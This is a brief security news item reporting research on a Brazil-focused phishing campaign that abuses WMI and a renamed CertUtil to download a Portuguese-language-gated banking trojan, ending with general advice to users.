Researchers have detected a [malware campaign focused on Brazil](https://blog.trendmicro.com/trendlabs-security-intelligence/malware-targeting-brazil-uses-legitimate-windows-components-wmi-and-certutil-as-part-of-its-routine/) that manipulates legitimate components of Windows, Windows Management Instrumentation (WMI) and CertUtil (an application that, among other functions, allows to view and configure certificate information) to download malicious payloads.
The campaign begins with emails assigned to the Brazilian Post Office, notifying the victim that it was not possible to deliver an order and that, for more information, it would be necessary to access a tracking code, which downloads a zip file on the computer. After this step, an LNK file is used to run Command and Control Server (C & C) scripts through WMI. To cover trails, attackers use a copy of CertUtil, which is stored in a temporary folder with a different name.
After a payload analysis, the researchers say that it is a banking malware that is only activated if the target computer language is set to Portuguese, demonstrating that the possible targets of the attack are Brazil and, perhaps, Portugal. Users are advised to be aware of emails that may appear suspicious, avoiding downloading suspicious and unsolicited files.
Article originally published in the Tempest Soundbites app, available to Tempest customers on Android and iOS versions. To get a credential, talk to your relationship manager.